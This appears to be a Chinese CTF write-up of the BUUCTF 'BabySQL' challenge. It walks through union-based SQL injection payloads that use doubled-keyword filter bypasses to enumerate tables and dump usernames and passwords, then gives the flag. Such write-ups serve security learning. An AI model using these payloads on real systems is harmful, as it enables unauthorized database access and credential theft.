[极客大挑战 2019]BabySQL—3.20BUUCTF练习day4(3)

[极客大挑战 2019]BabySQL-3.20BUUCTF练习day4(3)

做题过程

打开是以下页面(前几天有它的第一版第二版出现)输入1'

回显以下内容(还是字符型以单引号闭合,因为有报错信息回显)
输入1' order by 4%23回显成这个
被过滤了

先不管列数看看

输入1' union select 1,2%23判断显示位在哪里
那就使用以下双写绕过

输入1' ununionion seselectlect 1,2%23双写绕过,判断显示位这里显示列数不相同,那么为什么会有这个报错呢

这是因为union 的特性

你要查询语句的字段数量必须要和服务端数据库的查询语句字段数量要一致(指的是union前后的select后面的数字(例如刚刚的查询语句中的1,2字段数是2因为在数据库查询字段数不同所以报错)

那就试一试
1' ununionion seselectlect 1,2,3%23

好啦✔回显正确,之后就使用双写绕过

现在知道了列数(字段数)也知道了回显位(将数据回显在客户端屏幕上的位置)

该查询库名和用户名

输入-1' ununionion seselectlect 1,database(),user()%23
根据联合查询,该查询表名了

输入-1' ununionion seselectlect 1,group_concat(table_name),3 from information_schema.tables where schema_name='geek'%23
修改为-1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whewherere table_schema='geek'%23
我们查询b4bsql这个表里面的字段名

输入-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whewherere table_name='b4bsql'%23
查询字段内容

输入
-1' ununionion seselectlect 1,group_concat(id,0x3A,username,0x3A,password),3 frfromom b4bsql%23
那就再输入-1' ununionion seselectlect 1,group_concat(id,0x3A,username,0x3A,passwoorrd),3 frfromom b4bsql%23

得到flag
flag{0bbd78c4-ad10-4e17-92d7-72d0022bb992}

相关推荐
RestCloud14 小时前
SQL Server到Hive:批处理ETL性能提升30%的实战经验
数据库·api
RestCloud14 小时前
为什么说零代码 ETL 是未来趋势?
数据库·api
ClouGence16 小时前
CloudCanal + Paimon + SelectDB 从 0 到 1 构建实时湖仓
数据库
BingoGo21 小时前
2025 年 PHP 常见面试题整理以及对应答案和代码示例
后端·php
DemonAvenger1 天前
NoSQL与MySQL混合架构设计:从入门到实战的最佳实践
数据库·mysql·性能优化
AAA修煤气灶刘哥1 天前
后端人速藏!数据库PD建模避坑指南
数据库·后端·mysql
RestCloud2 天前
揭秘 CDC 技术:让数据库同步快人一步
数据库·api
得物技术2 天前
MySQL单表为何别超2000万行?揭秘B+树与16KB页的生死博弈|得物技术
数据库·后端·mysql
Bruce1232 天前
web专题之php代审(二)
php
白帽黑客沐瑶2 天前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业